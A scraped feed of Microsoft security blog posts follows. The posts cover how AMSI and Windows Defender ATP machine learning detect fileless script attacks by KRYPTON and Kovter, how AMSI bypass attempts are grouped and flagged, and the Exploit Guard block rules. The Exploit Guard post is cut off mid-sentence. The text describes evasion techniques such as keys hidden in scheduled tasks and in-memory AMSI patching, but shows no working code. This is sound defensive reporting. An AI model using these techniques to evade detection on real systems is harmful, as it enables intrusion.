AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.\n\nAs outlined in [our previous blog](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>), we employ a supervised machine learning classifier to identify breach activity. We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/8-amsi-ml-process-tree.png>)\n\n_Figure 7. Process tree augmented by instrumentation for AMSI data_\n\nAs shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (_winword.exe_) to launch PowerShell (_powershell.exe)_. In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware _fhjUQ72.tmp_, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build _expert classifiers_ for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.\n\nWith the instrumentation of AMSI signals added as part of the [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. Weve also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, [_ngrams_](<https://azure.microsoft.com/en-au/services/cognitive-services/text-analytics/>), and specific API invocations, to name a few.\n\nAs AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our _deep neural networks_ automatically learn features that are often hidden from human analysts.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/9-amsi-ml-javascript-powershell-alert.png>)\n\n_Figure 8. Machine learning detections of JavaScript and PowerShell scripts_\n\nWhile these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/10-amsi-ml-vbscript-network-alert.png>)\n\n_Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity_\n\n## Detection of AMSI bypass attempts\n\nWith AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:\n\n * Bypasses that are part of the script content and can be inspected and alerted on\n * Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs\n * Patching of AMSI instrumentation in memory\n\nThe Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.\n\nDuring actual [attacks involving CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>), Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by [Matt Graeber](<https://twitter.com/mattifestation/status/735261176745988096?lang=en>).\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/11-amsi-ml-bypass-alert.png>)\n\n_Figure 10. Windows Defender ATP alert based on AMSI bypass pattern_\n\nAMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/12b-amsi-ml-bypass-code-captured.png>)\n\n_Figure 11. AMSI bypass code sent to the cloud for analysis_\n\n## Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks\n\nProvided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.\n\nAMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.\n\nWith [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.\n\nApart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.\n\nTo benefit from the new script runtime instrumentation and other powerful security enhancements like [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/>), customers are encourage to install [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>).\n\nRead the [The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester](<https://wincom.blob.core.windows.net/documents/WDATP_TEI%20_infographic%20_final.pdf>) to understand the significant cost savings and business benefits enabled by Windows Defender ATP. To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advance attacks, [sign up for a free trial](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>).\n\n \n\n**Stefan Sellmer**, _Windows Defender ATP Research_\n\n_with_\n\n**Shay Kels**_, Windows Defender ATP Research _\n\n**Karthik Selvaraj**,_ Windows Defender Research_\n\n#### \n\n \n\n##### **Additional readings**\n\n * [Defend against PowerShell attacks](<https://blogs.msdn.microsoft.com/powershell/2017/10/23/defending-against-powershell-attacks/>), by Lee Holmes and the PowerShell team\n * [Windows Defender ATP machine learning: Detecting new and unusual breach activity](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>)\n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/MsftWDSI/>).", "modified": "2017-12-04T14:00:07", "published": "2017-12-04T14:00:07", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/12/04/windows-defender-atp-machine-learning-and-amsi-unearthing-script-based-attacks-that-live-off-the-land/", "id": "MMPC:30A997667BFA925FD541E3DCB1F1DEB6", "type": "mmpc", "title": "Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that \u2018live off the land\u2019", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-09T07:55:02", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8759"], "description": "[](<https://msdnshared.blob.core.windows.net/media/2017/12/1-amsi-ml-banner-small.jpg>)[](<https://msdnshared.blob.core.windows.net/media/2017/12/1-amsi-ml-banner-small.jpg>)\n\nScripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.\n\nScripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for \u201cliving off the land\u201d\u2014staying away from the disk and using common tools to [run code directly in memory](<https://blogs.technet.microsoft.com/mmpc/tag/in-memory-attacks/>). Often part of the operating system, scripting engines can evaluate and execute content from the internet on-the-fly. Furthermore, integration with popular apps make them effective vehicles for delivering malicious implants through social engineering as evidenced by the increasing use of [scripts in spam campaigns](<https://blogs.technet.microsoft.com/mmpc/2017/02/02/improved-scripts-in-lnk-files-now-deliver-kovter-in-addition-to-locky/>).\n\nMalicious scripts are not only used as delivery mechanisms. We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. During these latter stages, the scripting engine of choice is clearly PowerShell\u2014the _de facto_ scripting standard for administrative tasks on Windows\u2014with the ability to invoke system APIs and access a variety of system classes and objects.\n\nWhile the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.\n\nWindows 10 provides optics into script behavior through [Antimalware Scan Interface (AMSI)](<https://blogs.technet.microsoft.com/mmpc/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/>), a generic, open interface that enables [Windows Defender Antivirus](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-antivirus/windows-defender-antivirus-in-windows-10?ocid=cx-blog-mmpc>) to look at script contents the same way script interpreters do\u2014in a form that is both unencrypted and unobfuscated. In [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>), with knowledge from years analyzing script-based malware, we\u2019ve added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.\n\nThis unparalleled visibility into script behavior is capitalized further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc?ocid=cx-blog-mmpc>)). Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.\n\nIn this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP [machine learning systems](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.\n\n## KRYPTON: Highlighting the resilience of script-based attacks\n\nTraditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.\n\nApart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it is impossible to make a determination based on a single file without tracking the actual invocation of the script. Even a perfect script emulator would fail this task.\n\nFor example, the activity group KRYPTON has been observed hijacking or creating scheduled tasks\u2014they often target system tasks found in exclusion lists of popular forensic tools like [Autoruns for Windows](<https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns>). KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.\n\nTo illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by [John Lambert](<https://twitter.com/JohnLaTwC/status/915590893155098629>) and the [Office 365 Advanced Threat Protection](<https://products.office.com/en-au/exchange/online-email-threat-protection>) team.[](<https://msdnshared.blob.core.windows.net/media/2017/12/2-ams-ml-krypton-lure.png>)\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/2b-amsi-ml-krypton-lure.png>)\n\n_Figure 1. KRYPTON lure document_\n\nTo live off the land, KRYPTON doesn\u2019t drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (_wscript.exe_) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/3b-amsi-ml-krypton-chain.jpg>)\n\n_Figure _2_. KRYPTON script execution chain through wscript.exe_\n\n## Exposing actual script behavior with AMSI\n\nAMSI overcomes KRYPTON\u2019s evasion mechanisms by capturing JavaScript API calls after they have been decrypted and ready to be executed by the script interpreter. The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/4-amsi-ml-krypton-script-captured.png>)\n\n_Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis_\n\nBy checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/5-amsi-ml-krypton-script-alert.png>)\n\n_Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI_\n\n## PowerShell use by Kovter and other commodity malware\n\nNot only advanced activity groups like KRYPTON are shifting from binary executables to evasive scripts. In the commodity space, [Kovter malware](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Kovter>) uses several processes to eventually execute its malicious payload. This payload resides in a PowerShell script decoded by a JavaScript (executed by _wscript.exe_) and passed to _powershell.exe_ as an environment variable.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/6-amsi-ml-kovter-alert.png>)\n\n_Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload_\n\nBy looking at the [PowerShell payload content captured by AMSI](<https://blogs.technet.microsoft.com/poshchap/2015/10/16/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi/>), experienced analysts can easily spot similarities to [PowerSploit](<https://github.com/PowerShellMafia/PowerSploit>), a publicly available set of penetration testing modules. While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/7-amsi-ml-kovter-script-captured.png>)\n\n_Figure _6_. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis_\n\n## Fresh machine learning insight with AMSI\n\nWhile AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.\n\nAs outlined in [our previous blog](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>), we employ a supervised machine learning classifier to identify breach activity. We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/8-amsi-ml-process-tree.png>)\n\n_Figure 7. Process tree augmented by instrumentation for AMSI data_\n\nAs shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (_winword.exe_) to launch PowerShell (_powershell.exe)_. In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware _fhjUQ72.tmp_, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build _expert classifiers_ for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.\n\nWith the instrumentation of AMSI signals added as part of the [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. We\u2019ve also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, [_ngrams_](<https://azure.microsoft.com/en-au/services/cognitive-services/text-analytics/>), and specific API invocations, to name a few.\n\nAs AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our _deep neural networks_ automatically learn features that are often hidden from human analysts.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/9-amsi-ml-javascript-powershell-alert.png>)\n\n_Figure 8. Machine learning detections of JavaScript and PowerShell scripts_\n\nWhile these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/10-amsi-ml-vbscript-network-alert.png>)\n\n_Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity_\n\n## Detection of AMSI bypass attempts\n\nWith AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:\n\n * Bypasses that are part of the script content and can be inspected and alerted on\n * Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs\n * Patching of AMSI instrumentation in memory\n\nThe Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.\n\nDuring actual [attacks involving CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>), Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by [Matt Graeber](<https://twitter.com/mattifestation/status/735261176745988096?lang=en>).\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/11-amsi-ml-bypass-alert.png>)\n\n_Figure 10. Windows Defender ATP alert based on AMSI bypass pattern_\n\nAMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/12b-amsi-ml-bypass-code-captured.png>)\n\n_Figure 11. AMSI bypass code sent to the cloud for analysis_\n\n## Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks\n\nProvided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.\n\nAMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.\n\nWith [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.\n\nApart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.\n\nTo benefit from the new script runtime instrumentation and other powerful security enhancements like [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/>), customers are encourage to install [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>).\n\nRead the [The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester](<https://wincom.blob.core.windows.net/documents/WDATP_TEI%20_infographic%20_final.pdf>) to understand the significant cost savings and business benefits enabled by Windows Defender ATP. To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advance attacks, [sign up for a free trial](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>).\n\n \n\n**Stefan Sellmer**, _Windows Defender ATP Research_\n\n_with_\n\n**Shay Kels**_, Windows Defender ATP Research _\n\n**Karthik Selvaraj**,_ Windows Defender Research_\n\n#### \n\n \n\n##### **Additional readings**\n\n * [Defend against PowerShell attacks](<https://blogs.msdn.microsoft.com/powershell/2017/10/23/defending-against-powershell-attacks/>), by Lee Holmes and the PowerShell team\n * [Windows Defender ATP machine learning: Detecting new and unusual breach activity](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>)\n\n \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/msftWDSI/>).", "modified": "2017-12-04T14:00:51", "published": "2017-12-04T14:00:51", "id": "MMPC:6B8C3A836431A67926F568B51D67E59F", "href": "https://blogs.technet.microsoft.com/mmpc/2017/12/04/windows-defender-atp-machine-learning-and-amsi-unearthing-script-based-attacks-that-live-off-the-land/", "type": "mmpc", "title": "Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that \u2018live off the land\u2019", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-13T02:30:35", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11292", "CVE-2017-11826", "CVE-2017-8759"], "description": "Windows Defender Exploit Guard is a new set of intrusion prevention capabilities that ships with the [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/?p=7645?ocid=cx-blog-mmpc>). The four components of Windows Defender Exploit Guard are designed to lock down the device against a wide variety of attack vectors and block behaviors commonly used in malware attacks, while enabling enterprises to balance their security risk and productivity requirements.\n\nTraditional antivirus technologies are an integral aspect of the endpoint security stack through the identification and removal of malicious executables using a combination of cloud-based machine learning and heuristics. Despite advances in antivirus detection capabilities, attackers are continuously adapting and have been expanding their arsenal of tricks and techniques to compromise endpoints, steal credentials, and execute ransomware attacks without ever needing to write anything to disk. This emerging trend of fileless attacks, which compose over 50% of all threats, are extremely dangerous, constantly changing, and designed to evade traditional AV. Fileless attacks have two types: those that use non-traditional executable files (e.g., documents with active content in them), and those that exploit vulnerabilities.\n\nWindows Defender Exploit Guard utilizes the capabilities of the Microsoft [Intelligent Security Graph (ISG)](<https://t.co/UpWPG34Kwy>) and the world-class security research team at Microsoft to identify active exploits and common behaviors to stop these types of attacks at various stages of the kill chain. Although the underlying vulnerability being exploited varies, the delivery mechanism differs, and the payload changes, there is a core set of behaviors and vectors that many different attacks adhere to. By correlating streams of events to various malicious behaviors with the ISG, Windows Defender Exploit Guard provides the capability and controls needed to handle these types of emerging threats.\n\nThe four components of Windows Defender Exploit Guard are:\n\n * **[Attack Surface Reduction (ASR)](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?ocid=cx-blog-mmpc>):** A set of controls that enterprises can enable to prevent malware from getting on the machine by blocking Office-, script-, and email-based threats\n * [**Network protection**](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-exploit-guard/network-protection-exploit-guard?ocid=cx-blog-mmpc>): Protects the endpoint against web-based threats by blocking any outbound process on the device to untrusted hosts/IP through Windows Defender SmartScreen\n * [**Controlled folder access**](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/stopping-ransomware-where-it-counts-protecting-your-data-with-controlled-folder-access?ocid=cx-blog-mmpc>): Protects sensitive data from ransomware by blocking untrusted processes from accessing your protected folders\n * [**Exploit protection**](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-exploit-guard/exploit-protection-exploit-guard?ocid=cx-blog-mmpc>): A set of exploit mitigations (replacing EMET) that can be easily configured to protect your system and applications\n\n## Attack Surface Reduction (ASR): Intelligence to control the surface area of the device\n\nEmail and Office applications are generally thought of as keystones of enterprise productivity, yet they are the most common vector for attacks and can cause nightmares for security administrators. Both Office and email serve as simple and easy ways to distribute mechanism for bad actors to kick off malware and fileless attacks. Although Office macros and scripts have many productive use cases, malicious actors can use them to directly perform exploits that operate entirely in memory and are often undetectable by traditional AV techniques. All it takes is for a single user to enable macros on a legitimate-looking Office file, or to open an email attachment that executes a malicious PowerShell script, to compromise a machine.\n\nAttack Surface Reduction provides enterprises with a set of built-in intelligence that can block the underlying behaviors used by these malicious documents to execute without hindering productive scenarios. By blocking malicious behaviors independent of what the threat or exploit is, ASR can protect enterprises from never before seen zero-day attacks like the recently discovered [CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized?ocid=cx-blog-mmpc>)_, _[CVE-2017-11292 ](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>), and [CVE-2017-11826](<https://nvd.nist.gov/vuln/detail/CVE-2017-11826>).\n\nThe different behaviors ASR provides coverage for in Fall Creators Updated are split among [Office, scripts, and email](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard#attack-surface-reduction-rules?ocid=cx-blog-mmpc>).\n\nFor Office apps, ASR can:\n\n * Block Office apps from creating executable content\n * Block Office apps from launching child process\n * Block Office apps from injecting into process\n * Block Win32 imports from macro code in Office\n * Block obfuscated macro code\n\nAlthough malicious Office macros are oftentimes responsible for utilizing techniques like injection and launching of executables, ASR can also protect end-users from emerging exploits like [DDEDownloader](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:O97M/DDEDownloader.A&ocid=cx-blog-mmpc>), which has been recently gaining in popularity. This exploit uses the Dynamic Data Exchange (DDE) popup in Office Documents to run a PowerShell downloader; however, in doing so, it launches a child process that the corresponding child process rule blocks.\n\n(Note: To learn more about security settings that ensure Microsoft Office applications securely open documents with DDE fields, read [Microsoft Security Advisory 4053440](<https://technet.microsoft.com/library/security/4053440?ocid=cx-blog-mmpc>).)\n\nFor script, ASR can:\n\n * Block malicious JavaScript, VBScript, and PowerShell codes that have been obfuscated\n * Block JavaScript and VBScript from executing payload downloaded from internet\n\nTo highlight the intelligence behind ASR, we can look at how it can address obfuscated code as an example; in this case, there is a machine learning model powering our obfuscation detection capabilities that gets retrained multiple times per week in our cloud protection service. The model is updated on client, where it interfaces with [Antimalware Scan Interface (AMSI)](<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587\\(v=vs.85\\).aspx>) to make a determination on whether or not a script has been obfuscated for malicious purposes. When a high-confidence match occurs, any attempt made to access the script is blocked.\n\nFor email, ASR can: \n\n * ****Block execution of executable content dropped from email (webmail/mail-client)\n\nEnterprise administrators can set policies on their corporate email (e.g., Office 365) to limit the files that can be delivered to end user inboxes. However, they don\u2019t have control over the files that are delivered via personal email on company devices. Given the increase in spear-phishing, employees' personal emails are also targeted and need to be protected. ASR enables enterprise administrators to apply file policies on personal email for both webmail & mail-clients on company devices.\n\nFor any line of business applications running within your enterprise, there is the capability to customize file and folder based exclusions if your applications include unusual behaviors that may be impacted by ASR detection.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-1-2.png>)\n\nASR has a dependency on [Windows Defender Antivirus](<https://www.microsoft.com/en-us/windows/windows-defender?ocid=cx-blog-mmpc>) being the primary AV on the device and its [real-time protection](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware?ocid=cx-blog-mmpc>) feature must be enabled. The Windows 10 Security [baseline](<https://blogs.technet.microsoft.com/secguide/2017/09/27/security-baseline-for-windows-10-fall-creators-update-v1709-draft/>) recommends enabling most of the rules in Block Mode to protect your devices from these threat vectors.\n\n## Network protection: Blocking outbound connection\n\nThe internet is home to a swath of malicious websites that are designed to lure and trick users. They use phishing, deceptive ads, tech scams, social engineering, and other means as part of their campaigns. For some attacks, they seek to acquire information or get immediate financial payout, while others may attempt to install malware on the machine. Oftentimes malware will attempt to connect with a command-and-control server (C&C) to seek further instructions and deliver additional malicious payloads, such that the attacker can spread to additional machines on the network.\n\nWindows Defender SmartScreen protects Microsoft Edge from socially engineered malware, phishing, and other web-based threats through the power of the Intelligent Security Graph (ISG). This has made Microsoft Edge one of the most secure browsers out there, outperforming Chrome and Firefox in NSS Lab\u2019s recent [test results for phishing protection between August 23 and September 12, 2017](<https://research.nsslabs.com/reportaction/report-509/Marketing>).\n\nWindows Defender Exploit Guard\u2019s network protection capability utilizes this same intelligence from ISG to vet, and if necessary block, all outbound connections before they are made. This brings the same level of protection that we previously just had for Microsoft Edge across the entire system and network stack.\n\nBy integrating a new network filtering driver into the kernel, the network protection capability can evaluate and block outbound network traffic based on ISG\u2019s hostname and IP address-related reputation intelligence. With a combination of cloud lookups and performant caching to perform these reputation checks, the network protection capability can render web-based malware that depends on a communication channel inoperable.\n\nRegardless if 